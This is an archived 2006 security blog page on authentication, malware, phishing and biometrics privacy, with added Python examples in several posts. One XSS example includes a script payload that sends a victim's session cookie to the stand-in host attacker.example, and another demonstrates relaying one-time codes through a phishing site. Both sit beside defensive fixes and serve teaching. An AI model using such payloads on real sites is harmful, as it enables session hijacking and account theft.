About October 2006

This page contains all entries posted to AuthenticationWorld Blog in October 2006. They are listed from oldest to newest.


October 2006 Archives

October 14, 2006

Trojan Horses and Enterprise Security

In yesterday's CNET news, an article was posted titled "The future of malware: Trojan horses". It highlights how easily cybercrooks fly in under the enterprise's firewall and virus scanners by simply attaching an infected MS Office document to an email. The user opens the attachment, the malware is released, and the enterprise is at medium to high risk depending on what the malware does. Further, the article stated that only four antivirus products detected one type of attack that was first spotted months ago.

Bottom line: Don't expect your firewall and outer defences to defend the enterprise on their own. Like the castles built in medieval days, you need a series of defences with the strongest at the centre. In enterprises, the inner walls need to be built from identity defences: as an identity moves closer to high-risk systems, networks, buildings, rooms, applications and information, the authentication requirements must become progressively stronger.

Build a layered identity defense using stronger authentication or....you'll be sorry.

Welcome to the AuthenticationWorld Blog

Hi,


My name is Guy Huntington. For the past nine years, I have led many large Fortune 500 identity and authentication projects, including at Boeing, Capital One and Kaiser Permanente. I have many battle scars from implementing single sign-on, reduced sign-on, enterprise single sign-on, PKI, federated authentication, web services, LDAP directories, virtual directories, etc.

During the next several months I will be posting to this blog my reactions to topical news stories involving authentication, as well as putting forward my ideas on things that might not be making news but are definitely on the authentication radar screen. This will include things like "who owns a biometric?", the use of DNA for identification and authentication, layered identity defences, etc.

Please join with me in this conversation. I welcome all your comments, ideas and criticisms.

Regards,

Guy Huntington
guy.huntington@authenticationworld.com
www.authenticationworld.com

October 15, 2006

Who owns my DNA and my biometric data?

Hi,

Over the course of the next few months, I am going to be talking about who owns the biometric data you submit to an enterprise for identification and authentication. It is an area I am personally very concerned about, since I feel that the technology and the usage of biometrics are way ahead of the laws that protect the user.

Today, in many jurisdictions around the world, there are laws pertaining to DNA databases. The laws vary widely on how the data is used. During the next month, I'll publish a review of the existing laws and discuss the implications to the citizen.

If you have any special knowledge on the laws in this area or concerns, please email me to let me know. I will take this into consideration in drafting my initial report.

Regards,

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Big Brother is Watching

New RFID tech would track airport passengers

The story above, posted on Friday on CNET, is another sign that Big Brother is watching your movements more and more. Under the banner of airport security, it states that within two years most airports will have everyone in the airport wear a tag that emits a radio signal (an RFID tag), enabling the authorities to see where you are at any point in time within the airport.

While I am in favour of supporting good security, this is ridiculous. What airport security breach or disaster over the last several years has been caused by not knowing where a person is at any point in time? The people who hijacked the planes that attacked New York were all captured on camera as they entered the airport and went to the gates. The problem was that nobody knew they were terrorists to begin with.

There are enough security cameras already in airports to monitor suspicious people. There is no requirement to know exactly who I am and what I am doing in the airport or any other public place.

The march of Big Brother with RFID continues with the insertion of RFID chips in new US passports. As Bruce Schneier, the noted security guru, notes in the most recent issue of his monthly Crypto-Gram newsletter, http://www.schneier.com/crypto-gram-0610.html#3, there are too many questions to be answered before governments use RFID in their passports. His recommendation is to get a new passport without an RFID chip now, before governments around the world begin full-scale introduction during the coming year.

Big brother is watching and it's beginning to be too much. What do you think?

October 16, 2006

Another reason to have a layered enterprise security strategy

Today it was widely reported that a new bug exists in MS PowerPoint. Some experts deem the bug highly critical.

The great threat to enterprises is an MS Office document that is infected with malware and attached to an email. This effectively passes underneath the enterprise firewall and anti-virus radar, and the malware is then released from inside the enterprise network, where it could easily capture the user IDs and passwords your users rely on internally.

This is but one of many examples of why enterprises need to deploy a layered identity strategy. In my paper "Battling Botnets and Rootkits - A layered identity strategy" I refer to nine recommended security layers.

Hopefully you are not like most enterprises that still rely upon the firewall, anti-virus software and uid's and passwords as the main lines of defence.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 17, 2006

Are five anti-virus products enough for an enterprise?

On October 5, 2006 a company in the UK, GFI, issued a press release titled "GFI warns one anti-virus engine is not enough to protect your business". They have recently published a report saying that one antivirus product is no longer sufficient for an enterprise. The report quotes "According to the 2006 FBI Crime and Security Survey, 97% of organizations have anti-virus software installed, yet 65% have been affected by a virus attack at least once during the previous 12 months. Network World cited studies that placed the cost of fighting Blaster, SoBig.F, Sober and other email viruses at $3.5 billion for US companies alone. Similarly a 2006 study by the British government found that 43% of companies in the United Kingdom were infected by viruses during 2005."

Their solution is of course their own product which can manage several different anti-virus vendors. Their thinking is that more is better.

While there may be some merit to the idea that anti-virus software from one vendor might not catch all malware, even the best, most up-to-date antivirus system in the world will not be enough on its own.

A janitor who installs a hardware keystroke logger on your key users' computers at night flies completely underneath the enterprise radar. A criminal with a directional microphone ("sound dish") can record the sound of your office keystrokes and, with acoustic analysis, quickly recover your ID and password.

The answer is to have a layered identity defence. "Battling Botnets and Rootkits - A Layered Identity Defense" describes the overall architecture required.

Beware vendors who claim their one product will solve the problem. It is likely to be breached.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

What is the right password strategy?

A September report from Nucleus Research, "What is the right password strategy?", found that "Unfortunately, more than one out of every three enterprise users keep a written record of their passwords. Contrary to popular belief, a survey of 325 users found that making users choose complex passwords or change them frequently doesn't make them more likely to write them down."

They note "Of the third of users that write down their passwords, one third of those do it on paper, such as a sticky note. Even more dangerous are the other two thirds: they keep their passwords as a text file on their laptop PC or mobile device, where it could be easily lost or stolen."

Further: "Although single sign-on may be convenient, it didn't reduce the likelihood users would write down their passwords either: whether users had one, two to three, or four or more passwords to remember at work, roughly one third of all of them wrote down their passwords."

Okay, all of this makes sense. However, their recommendation does not.

"Educating users on password security may have some effect. However, this study shows that if you're looking for real access security, you'll need to look beyond passwords. Some companies look to biometrics to increase security; other vendors such as Unomi are promoting cognitive biometrics as a higher-level authentication technology. Companies concerned about password security should continue to watch innovation in the authentication market."

This is what I call the "silver bullet solution". A BIOMETRIC IS NOT A SECRET. Further, there are wide differences in the accuracy, false positive and false negative rates of different types of biometrics. Biometrics alone are not the answer.

Sorry to keep repeating the same recommendation in each post, but here it is again. Enterprises need a layered enterprise identity strategy. It could start with one password to gain general access (preferably entered without a keyboard, so that a keystroke logger cannot capture it); then, as risk rises, the user should be required to provide combinations of something they know (normally a secret), something they have (a smart card, an RSA SecurID token, etc.) and something they are (one of many types of biometrics).

There is no magic bullet.
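To make the "as risk rises, require more" rule concrete, here is a small risk-tiered step-up policy evaluator. It is an added example, not code from the original post or from any product mentioned on this page; the resource names, tier thresholds and freshness limits are hypothetical values chosen for illustration. Two points it demonstrates that the paragraph above only states: two secrets (a password plus a PIN) still count as a single factor category, and a proof that is too old for a high-risk resource must be redone even if the session is still logged in.

```python
"""Risk-tiered step-up authentication: which factor categories a session must
have proven (and how recently) before it may touch a resource at a given risk
level. Added example with hypothetical policy values; not vendor code."""
from dataclasses import dataclass, field
from enum import IntEnum

# The three classic factor categories. A password and a PIN are both
# "something you know": two secrets still count as ONE category.
KNOW, HAVE, ARE = "something-you-know", "something-you-have", "something-you-are"
CATEGORY_OF = {
    "password": KNOW, "pin": KNOW, "secret-questions": KNOW,
    "smart-card": HAVE, "otp-token": HAVE,
    "fingerprint": ARE, "voice": ARE,
}

class Risk(IntEnum):
    LOW = 1       # general intranet access
    MEDIUM = 2    # customer data
    HIGH = 3      # payroll, source code
    CRITICAL = 4  # wire transfers, domain administration

@dataclass(frozen=True)
class Tier:
    required: frozenset   # categories that must all be present
    min_categories: int   # distinct categories needed in total
    max_age_s: int        # a proof older than this must be redone

# Policy table (hypothetical): stronger and fresher as risk rises.
POLICY = {
    Risk.LOW:      Tier(frozenset(),            1, 8 * 3600),
    Risk.MEDIUM:   Tier(frozenset({HAVE}),      2, 4 * 3600),
    Risk.HIGH:     Tier(frozenset({HAVE}),      2, 15 * 60),
    Risk.CRITICAL: Tier(frozenset({HAVE, ARE}), 3, 5 * 60),
}

# Constructed resource classification for the example.
RESOURCE_RISK = {
    "intranet-portal": Risk.LOW,
    "crm": Risk.MEDIUM,
    "hr-payroll": Risk.HIGH,
    "wire-transfer": Risk.CRITICAL,
}

@dataclass
class Session:
    proofs: dict = field(default_factory=dict)  # factor name -> unix time verified

def fresh_categories(session: Session, now: int, max_age_s: int) -> set:
    """Categories proven recently enough for the tier being evaluated."""
    cats = set()
    for factor, verified_at in session.proofs.items():
        if factor in CATEGORY_OF and now - verified_at <= max_age_s:
            cats.add(CATEGORY_OF[factor])
    return cats

def access_decision(resource: str, session: Session, now: int) -> tuple:
    """Return ("allow", set()) or ("step-up", <categories still to prove>)."""
    tier = POLICY[RESOURCE_RISK[resource]]
    have = fresh_categories(session, now, tier.max_age_s)
    missing = set(tier.required) - have
    # If named requirements still leave us short of the count, demand any
    # category not yet proven (deterministic order: know, have, are).
    shortfall = tier.min_categories - len(have | missing)
    if shortfall > 0:
        unused = [c for c in (KNOW, HAVE, ARE) if c not in (have | missing)]
        missing.update(unused[:shortfall])
    return ("allow", set()) if not missing else ("step-up", missing)

if __name__ == "__main__":
    now = 1_000_000
    s = Session({"password": now - 600, "otp-token": now - 600})
    for r in RESOURCE_RISK:
        print(r, access_decision(r, s, now))
```

The evaluator never lowers a requirement because the user "already logged in"; it only asks whether the proofs on the session are strong enough and fresh enough for the resource in front of it, which is what a layered identity defence means in practice.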

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 18, 2006

Is the botnet battle already lost?

Hi,

There's some depressing reading at eWeek. "Is the botnet battle already lost?" accurately describes the pitiful state enterprises are in trying to combat botnets. The general feeling is the war is lost for at least the next year or two.

The battle may be lost but the war doesn't have to end unfavorably for enterprises. What the article says is that botnets with their trojan and malware attack vectors are going to successfully defeat your outer firewalls and anti-virus programs. What the article doesn't say is how to accept this and build a successful strategy. That's where a layered enterprise identity strategy comes in.

Read my paper "Battling botnets and rootkits - A layered identity strategy". It describes nine layers of enterprise defences.

While the first three outer layers should still be worked on, you must assume they will be breached. The other layers provide ways to restrict access by botnets, rootkits and other malware to the enterprise's highest-risk applications, information, networks, buildings, floors and rooms.

It's time to wake up and smell the botnet electrons and get a layered defense ready to at least contain the damage.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 19, 2006

Protecting your passwords

Are you like me, having trouble remembering all the user IDs and passwords you use? Do you keep using the same ID and password over and over for all the sites? As you get older, are you forgetting which password you used for which site? Are you writing the passwords down or keeping them on your computer insecurely?

While I am against the use of keyboard-entered passwords in general, the fact is we are stuck with them. Therefore I strongly recommend the free software Password Safe, originally produced by Bruce Schneier, the internet security guru.

This is a password vault using Schneier's Blowfish cipher. It is very easy to use and will help you stop forgetting your IDs and passwords, writing them down, or storing them on your computer insecurely.

However, note that the vault is protected by a....password! Therefore the overall security is weak: everything rests on that one master password. Why? The password can be obtained by a hardware or software keystroke logger, guessed using social engineering, or cracked by brute force.

Having said that, it is a better alternative than writing them down, forgetting them or storing them unsecurely.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 20, 2006

Identity federation getting dose of reality from Internet2 affiliate

Identity federation continues to inch forward. This story from Network World describes a federation between 24 universities and 11 other enterprises. InCommon is the identity federation hub, using Shibboleth.

InCommon, while acting as the identity hub, doesn't set trust standards. That is done by the universities and other parties as they negotiate their trust. However, InCommon does set two criteria for participants: "The first is that their identity management system must fall under the purview of the organization's executive management, and second, the system for issuing end-user credentials must have appropriate risk management measures in place."

The universities are using InCommon and Shibboleth to create trust agreements not only between themselves but also with their business partners.

Federation hubs like InCommon are the wave of the future. They act as a legal framework within which trust is negotiated.


Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 23, 2006

Trojan Attacks Increasing in sophistication

Last Friday, eWeek ran a story, "Spam Trojan Installs Own Anti-Virus Scanner", about a new form of Trojan attack that comes with its own anti-virus scanner. This level of sophistication hasn't been seen before in Trojans.

The threat to users of infected computers from this type of attack is very large. The trojans are getting much smarter at outwitting the existing anti-virus software on your computer, as well as at removing competing malware.

Bottom line - You're in an arms race where it doesn't pay to stand still and rely upon one or two levels of defense i.e. the firewall and the anti-virus software. While you need to keep up pressure on your firewall and anti-virus vendors to quickly produce updates in response to these types of attacks, you must not rely upon these defences to keep out all attacks.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Time to educate the end user about password and identity theft

Today in Australia, the Internet Industry Association (IIA) announced it will be offering end users free trials of anti-spyware, anti-virus and anti-spam products as part of its GetNetSafe program. The program will help raise awareness of spyware's ability to log keystrokes and steal personal information from computers.

"The focus of computer threats has changed considerably over the last 12 months to become highly targeted at small groups of internet users", Sean Richmond of Sophos said in a statement.

“Cyber criminals are using spyware programs, trojan horses and phishing campaigns to acquire corporate and personal information in the hope of stealing significant amounts of money from their victims.”

Hmmm...I think there's a lot of end user and enterprise education that must be done quickly. I will have a series of product announcements to aid in this effort in three weeks time.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 24, 2006

Two factor authentication and identity theft

The age of passwords is dead. They are too easily broken by brute-force computation, by social engineering or by keystroke logging. The solution recommended by security experts for the last few years has been multi-factor authentication.

This usually uses some kind of smart card or token that produces a one-time password the enterprise can verify, combined with a user ID and perhaps also a password. The chance of someone else masquerading as the identity is a lot lower when they must hold the card and know the secret than when they simply have to type an ID and password into a screen.

However, as I watch the commercial landscape and see all sorts of two-factor authentication emerging, I am reminded of a blog post Bruce Schneier, the noted internet security guru, wrote in April 2005. In it Bruce notes that two-factor authentication won't stop identity theft; it merely means that criminals change their tactics.

In other articles Bruce notes that phishing tactics simply adjust to two-factor authentication: the criminals' fake site relays both the changing part of the credential (the one-time code) and the non-changing part (the password) straight on to the real bank, in real time, before the code expires.

Will two-factor authentication solve identity theft? No. However, it is a much better tool for mitigating the attacks than the password alone.
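The relay attack described above can be shown end to end with a few lines of code. This is an added example, not code from the original post or from Bruce Schneier; it implements the HOTP/TOTP algorithms from RFC 4226 and RFC 6238 in standard-library Python, with a toy verifier (`Bank`) and a toy phishing relay. The secret is the RFC 6238 reference secret and the timestamps are fixed so the run is reproducible; they are not real account values. The point it makes is that the verifier has no way to know who typed the code: a relay within the 30-second window (plus the usual one-step skew tolerance) succeeds, while a code forwarded minutes later, or replayed after the victim has already used it, fails.

```python
"""RFC 4226/6238 one-time codes and a real-time phishing relay against them.
Added example; toy verifier and constructed values, not a real bank."""
import hashlib
import hmac
import struct

STEP = 30     # seconds per TOTP window
WINDOW = 1    # accept one step of clock skew either side (common practice)

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP (RFC 4226): dynamic truncation of HMAC-SHA1(secret, counter)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, now: int, digits: int = 6) -> str:
    """TOTP (RFC 6238): HOTP over the current 30-second time step."""
    return hotp(secret, now // STEP, digits)

class Bank:
    """Verifier side. Remembers consumed counters so a code cannot be replayed."""
    def __init__(self, secret: bytes, password: str):
        self.secret = secret
        self.password = password
        self.used_counters = set()

    def login(self, password: str, code: str, now: int) -> bool:
        if not hmac.compare_digest(password, self.password):
            return False
        counter = now // STEP
        for c in range(counter - WINDOW, counter + WINDOW + 1):
            if c in self.used_counters:
                continue
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.used_counters.add(c)
                return True
        return False

def relay_phish(bank: Bank, password: str, code: str, victim_time: int, delay_s: int) -> bool:
    """The attacker's fake site forwards exactly what the victim typed to the
    real bank delay_s seconds later. Returns whether the attacker got in."""
    return bank.login(password, code, victim_time + delay_s)

# Constructed demo values: RFC 6238 reference secret, fixed timestamp.
SECRET = b"12345678901234567890"
PASSWORD = "correct horse"

def demo() -> tuple:
    """(fast relay succeeds, slow relay fails, replay after victim login fails)"""
    t = 1_111_111_109                       # the 'now' on the victim's token
    code = totp(SECRET, t)                  # what the victim reads off the token
    fast = relay_phish(Bank(SECRET, PASSWORD), PASSWORD, code, t, delay_s=5)
    slow = relay_phish(Bank(SECRET, PASSWORD), PASSWORD, code, t, delay_s=180)
    bank = Bank(SECRET, PASSWORD)
    bank.login(PASSWORD, code, t)           # victim logs in for real first...
    replay = bank.login(PASSWORD, code, t + 5)   # ...then the attacker replays
    return fast, slow, replay

if __name__ == "__main__":
    print("fast relay, slow relay, replay:", demo())
```

Nothing in `Bank.login` is wrong; it is a correct, replay-resistant TOTP verifier. The code is simply not bound to the site the user believes they are talking to, which is exactly the gap a real-time phishing proxy exploits.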

What are solutions for preventing phishing attacks?

There is the use of trusted third-party identification. The trusted third party validates the identity of the user. This will help reduce phishing BUT only as long as the trusted third party is validating the real identity. When the trusted third party is spoofed by a masquerader, identity theft can still occur.

We're in an arms race where no one solution is going to solve the problem.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

"DNA Database should include all"- NOT!

A news story today in the Daily Telegraph in London "DNA Database should include all" quotes Tony Blair as saying all UK citizens should be in the database.

"Downing Street said later that no thought had been given at this stage to requiring everyone to give a DNA sample, although they will have to give scans of their eye and fingerprints for a passport and eventually a national identity card. At this stage, the Prime Minister believed it was a "personal matter" whether people, including other Government ministers, should volunteer their DNA."

This is exactly what I am very worried about! It is government creep on indexing pieces of an identity for which there are no laws in place:
* protecting the identity from misuse of its biological information
* guaranteeing an identity's privacy
* requiring specific processes to collect the samples
* requiring strong security around the data
* requiring specific legal approvals from the identity for a search to be made on their sample
* no idea on differentiating identical twins
etc.

This past spring I wrote a draft white paper "The Challenges With Identity Verification". In it I called for a national DNA database where the user has almost full control over when their data can be searched.

Let me state that my preference is that there be no national biological identity registry. However, if there is going to be one, then let the identity have control over their biological identity and strictly govern how the data is collected, how it's stored and how any search can be made against this. I wrote the white paper as I feared government creep on DNA.

If you're reading this blog and you're worried about what the government knows about you, then it's time to take action. Let your politicians know your concerns. Otherwise, government creep will put in place systems that erode the basic biological definition of you. In the not so distant future, a DNA sample will allow others to clone you or pieces of you.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 25, 2006

Voice Authentication Used in Telephone Banking

RSA announced yesterday the new product offering of biometric voice authentication for banking transactions. This offering relies on the voice biometric AS WELL AS transaction authentication.

Each call is given a risk score. Higher-risk transactions require more authentication of the identity, including asking secret questions. Each call is weighed not only on the biometric but also on the user's behaviour profile (e.g. time of day, the phone number the call comes from, the transaction amount versus the history of transactions, etc.).

This is a good example of the future of authentication. Based on enterprise risk, a multi-factor authentication model is applied. For higher risk activities, such as financial transactions, transaction authentication is used to supplement the initial authentication. Therefore, even if the authentication was successful, in this case using a biometric, the transaction may be stopped, further questions asked, or a manager flagged in real time if the user profile exhibits unusual behaviour.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

How phishing can adjust to multi-factor authentication

In an earlier blog about two factor authentication, I discussed how phishing attacks would adjust for this and that two factor authentication would not prevent identity theft. This blog will give one example of this.

Last month MITRE, a US government-funded institution, said the number one security threat was cross-site scripting (XSS). XSS arises where a website accepts content from the user, such as a search term or a form field, and writes it back into a page without encoding it, so that script supplied by an attacker runs in the victim's browser inside the victim's logged-in session.

Here's how a phishing attack might work in the future using this vulnerability. The user clicks on a link in their email. The link directs them to the legitimate website of the company, but carries the attacker's script in a parameter. The user logs in with their multi-factor authentication (an ID and a SecurID token, for instance). Once the user is successfully logged on, unbeknownst to them the cross-site script kicks in and hands control of the user's session to a criminal. The criminal proceeds to make a withdrawal from the bank account, use the user's credit card to make a purchase, or whatever.
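The reflected XSS that makes the scenario above possible is a one-line mistake on the server. The following added example, which is not from the original post and not from any real bank, shows a vulnerable search handler next to the corrected one, with a constructed phishing link whose payload sends the victim's session cookie to an attacker-controlled host; `bank.example` and `attacker.example` are placeholder names. The fix is to encode at the point where user data is written into HTML, every time, rather than trying to "strip out" bad input.

```python
"""Reflected XSS on a search page: vulnerable handler beside the fixed one.
Added example with constructed placeholder hosts; not a real site's code."""
import html
from urllib.parse import parse_qs, quote, urlparse

def query_from_link(link: str) -> str:
    """The 'q' parameter the victim's browser submits when the link is clicked."""
    return parse_qs(urlparse(link).query).get("q", [""])[0]

def render_search_vulnerable(q: str) -> str:
    # User input concatenated straight into markup: the browser parses
    # whatever it contains as HTML, script included.
    return f"<html><body><h1>Results for: {q}</h1></body></html>"

def render_search_fixed(q: str) -> str:
    # Output encoding at the sink: < > & and quotes become entities, so the
    # browser displays the text instead of executing it.
    safe = html.escape(q, quote=True)
    return f"<html><body><h1>Results for: {safe}</h1></body></html>"

def contains_script(page: str) -> bool:
    """Crude stand-in for the browser's parser: would a script element or an
    inline event handler come out of this page?"""
    lowered = page.lower()
    return "<script" in lowered or " onerror=" in lowered or " onload=" in lowered

# Constructed phishing link. Note the host is the LEGITIMATE site; only the
# search parameter is attacker-controlled, and it runs after the victim has
# completed their multi-factor login on that site.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
PHISHING_LINK = "https://bank.example/search?q=" + quote(PAYLOAD, safe="")

def handle(link: str, renderer) -> str:
    """What the server would send back for the clicked link."""
    return renderer(query_from_link(link))

if __name__ == "__main__":
    print("vulnerable page executes script:",
          contains_script(handle(PHISHING_LINK, render_search_vulnerable)))
    print("fixed page executes script:",
          contains_script(handle(PHISHING_LINK, render_search_fixed)))
```

Marking the session cookie HttpOnly stops this particular payload from reading `document.cookie`, but a script running in the victim's session can still issue requests as the victim, so encoding the output is the fix and cookie flags are only a backstop.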

Therefore strong authentication has not prevented identity theft. The best defence is for the enterprise to use transaction authentication software to mitigate the risk from these types of attacks. Transaction authentication would note that the withdrawal amount is much larger than usual, or the purchase too large compared to historical purchases, or the destination of the money or product not in keeping with the customer's history, or the IP address different from normal, etc. It would then stop the transaction, flag a manager in real time, or ask the user more personal questions to validate their identity.
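The transaction-authentication logic described here, and the risk scoring of calls in the RSA voice-authentication post above (time of day, originating number, amount versus history), are the same idea: score the request against the customer's own past behaviour and decide allow, challenge or block regardless of whether the login succeeded. The following added example, not from the original post and not RSA's or any vendor's code, implements that scoring over a constructed customer history; the rule weights and thresholds are hypothetical and would be tuned on real fraud data.

```python
"""Transaction authentication: score a request against the customer's own
history and decide allow / challenge / block. Added example; hypothetical
weights and a constructed history, not a vendor's scoring model."""
from dataclasses import dataclass
from statistics import mean, pstdev

@dataclass(frozen=True)
class Txn:
    amount: float
    hour: int      # local hour of day, 0-23
    origin: str    # calling number or client IP address
    dest: str      # payee or shipping destination

# Rule weights and decision thresholds (hypothetical).
W_AMOUNT, W_ORIGIN, W_DEST, W_HOUR = 40, 25, 20, 15
ALLOW_BELOW, BLOCK_AT = 25, 70

def risk_score(txn: Txn, history: list) -> tuple:
    """Return (score, reasons). Every rule compares the transaction with this
    customer's own past behaviour, not with a global list of bad things."""
    score, reasons = 0, []
    amounts = [t.amount for t in history]
    if amounts:
        avg, sd = mean(amounts), pstdev(amounts)
        ceiling = avg + 3 * max(sd, 0.25 * avg)   # floor on sd for flat histories
        if txn.amount > ceiling:
            score += W_AMOUNT
            reasons.append(f"amount {txn.amount:.2f} exceeds usual ceiling {ceiling:.2f}")
    if txn.origin not in {t.origin for t in history}:
        score += W_ORIGIN
        reasons.append(f"unfamiliar origin {txn.origin}")
    if txn.dest not in {t.dest for t in history}:
        score += W_DEST
        reasons.append(f"new destination {txn.dest}")
    hours = [t.hour for t in history]
    if hours and not (min(hours) - 1 <= txn.hour <= max(hours) + 1):
        score += W_HOUR
        reasons.append(f"hour {txn.hour:02d}:00 outside usual {min(hours):02d}-{max(hours):02d}")
    return score, reasons

def decide(score: int) -> str:
    """Map the score onto the three outcomes named in the post."""
    if score < ALLOW_BELOW:
        return "allow"
    if score < BLOCK_AT:
        return "challenge"   # ask secret / more personal questions
    return "block"           # stop it and flag a manager in real time

# Constructed history for one customer: daytime, one phone number, two payees.
HISTORY = [
    Txn(40, 9, "+1-555-0100", "grocer"),
    Txn(55, 12, "+1-555-0100", "utility"),
    Txn(60, 17, "+1-555-0100", "grocer"),
    Txn(45, 10, "+1-555-0100", "grocer"),
    Txn(50, 14, "+1-555-0100", "utility"),
    Txn(70, 18, "+1-555-0100", "grocer"),
    Txn(65, 11, "+1-555-0100", "utility"),
    Txn(52, 16, "+1-555-0100", "grocer"),
]

def evaluate(txn: Txn, history=HISTORY) -> tuple:
    """(decision, score, reasons) for one transaction."""
    score, reasons = risk_score(txn, history)
    return decide(score), score, reasons

if __name__ == "__main__":
    # A hijacked session issuing a large transfer at 3 am from a new address.
    print(evaluate(Txn(2500, 3, "203.0.113.7", "mule-account")))
```

Because the hijacked-session withdrawal is scored on its own merits, it is blocked even though the login that preceded it was a perfectly valid multi-factor login.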

More references and blogs on cross-site scripting:
Brian Krebs Washington Post - Flaws in Financial Sites Aids Scammers
Brian Krebs Washington Post - Cross site scripting flaws abound
Computerworld - How to defeat the new No. 1 security threat: cross-site scripting
Security Lab's XSS list

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 27, 2006

A great read - "anti-virus is ineffective"

eWeek released a story yesterday, "Rutkowska: Anti-Virus Software Is Ineffective", which I strongly recommend readers read. The article interviews Joanna Rutkowska, who has recently gained a lot of press for demonstrating a rootkit attack on Windows Vista. More importantly, she also introduced "Blue Pill".

Blue Pill is a small program that uses the CPU's hardware virtualization support to create a virtual machine, moves the running native operating system into that virtual machine on the fly, and installs itself beneath it as a "hypervisor". The hypervisor can take control of the full operating system without the system administrators even knowing about it.

Rutkowska says she thinks it will be two to three years before OS and hardware vendors create defence mechanisms. She points out that this kind of attack will usually come as a targeted attack rather than in a broad-scale worm.

Her analysis of anti-virus software is very harsh. She says of existing anti-virus software: "They all concentrate on finding "the bad" instead of verifying that system is in a "good" shape." Further, she goes on to say: "Similarly, we see that most of the rootkit scanners implement various hacks to detect hidden objects, like hidden processes, forgetting that it's possible to create a powerful stealth malware without even creating a process. There's no need to hide anything. I actually demonstrated a "stealth-by-design" malware almost a year ago."

Joanna then goes on to describe what she thinks the future is for anti-virus software. Type II malware ("malware which doesn't modify any code sections in memory, just data sections (thus it's so difficult to detect)") should be detected by checking the integrity of all system components.

She points out that even a perfect integrity check of all system components will not detect Type III malware, of which Blue Pill is an example: "The whole point about Blue Pill is that it does not introduce even a single byte modification into kernel, or other processes' memory. So, no matter how sophisticated (complete) our integrity checker is, we would never detect it. We can only count on detecting some side effects, like network communication or trying to detect the presence of a hypervisor using a timing analysis."

All in all, I can't imagine a stronger case for having a multi-layered enterprise defense strategy. Enterprises must admit that their existing firewall and anti-virus software won't stop all attacks over the next one to three years. As a result, they need to implement stronger and stronger layers of defences for higher risk networks, applications and information.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

More information on Blue Pill

This is just a short note to point readers to more information on Blue Pill, which I described in my previous post. For more information on Blue Pill go to Joanna's blog, "Invisible Things".

Article comparing Intel VT vs AMD Pacifica

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 28, 2006

Legal implications of a federated authentication

Oftentimes, federated authentication trust projects hit the wall. The main reason is that the enterprise lawyers get involved, and all too often IT departments are caught unaware of what's required to create a trust federation.

To help educate IT and legal enterprise managers about this, I have just released a new white paper, "Creating a Federated Authentication Trust". In it, I highlight the many things that need to be well thought through when creating an authentication trust. In the paper I also reference some excellent resources on federation from Ping Identity and the Liberty Alliance.

Enterprises need to be warned to allow enough time and to bring the lawyers in early in a trust creation. The first one will normally take the longest, as your enterprise lawyers get up to speed on what needs to be in a trust agreement.

It is to your advantage to join in a larger trust framework where many of the legal issues have already been worked out. What you want to avoid, if possible, is having to negotiate each trust agreement with all of the trust parties.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 29, 2006

Get beyond zero day patch thinking

A recent story in Computerworld, "'Less than zero-day' threats too often overlooked, analysts warn", is but another indication that enterprises need a deep set of layered defences to contain damage and protect themselves.

The article points out that too many enterprises are focusing on patches for zero-day threats. As a number of analysts point out, this approach doesn't address attacks already in the wild that have not yet been reported.

A couple of days ago I blogged about Blue Pill. This is one type of attack that most enterprises are unlikely to know about. Further, there are a number of other malware attacks for which the response from anti-virus vendors is slow.

We are in an arms race where the tactical advantage currently lies with the attackers. Organized crime has thousands, or hundreds of thousands, of programmers who are paid to breach systems, and the attacks are growing increasingly sophisticated. For example, for the first half of 2006 Microsoft noted that it had found 43,000 new variants of backdoor trojans and bots being broadcast by millions of computers to infect the internet.

It's not just the financial institutions that need to be worried. Small and medium businesses, non-profits, local, state and national governments also need to be worried since these attacks can easily be targeted at them as well.

The writing is on the wall for the next few years. There will be lots of stories of serious breaches, criminal theft and managers saying "we're taking steps to quickly address this" after they're attacked...when it's too late. If you don't want to be in this situation, then plan now for serious breaches and contain the damage by building layered security.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Canadian authentication guidelines

The Government of Canada's Office of the Privacy Commissioner has recently released "Guidelines for Identification and Authentication". It provides a good high-level fly-over of identification and authentication.

The only comment I have to make is that the document should have raised a point about the use of biometrics and the privacy rights of the user to have their biometric information used. As far as I know, and perhaps I'm wrong, there is no legislation in most jurisdictions in the world specifying how biometric information can be used, the storage requirements for it, the retention time allowed for an enterprise to keep it, and the rights of the user over its use. My own personal opinion is that this is a case where technology is way ahead of the rights of the citizen.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Scams Target Latest Upgrades in E-Banking Security

Brian Krebs of the Washington Post has a great blog post today titled "Scams Target Latest Upgrades in E-Banking Security". He notes that phishing attacks are rapidly adapting to the multi-factor authentication protection deployed by the banks.

This merely confirms what I wrote about earlier "Two factor authentication and identity theft". It's what Bruce Schneier wrote about in 2005.

Bottom line...multi-factor authentication is a good step forward BUT it won't prevent identity theft. The user has to be educated to not click on links in emails, no matter how legitimate they look or even if they come from a friend or business colleague. Caveat emptor!

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Deny all CPU defense

This past week Richard Stiennon, a noted network guru, did a podcast with Ken Steinberg, CEO of Savant Protection. Savant, a relatively new startup, offers the ability to deny all execution on a machine unless the application or request carries an approved certificate.

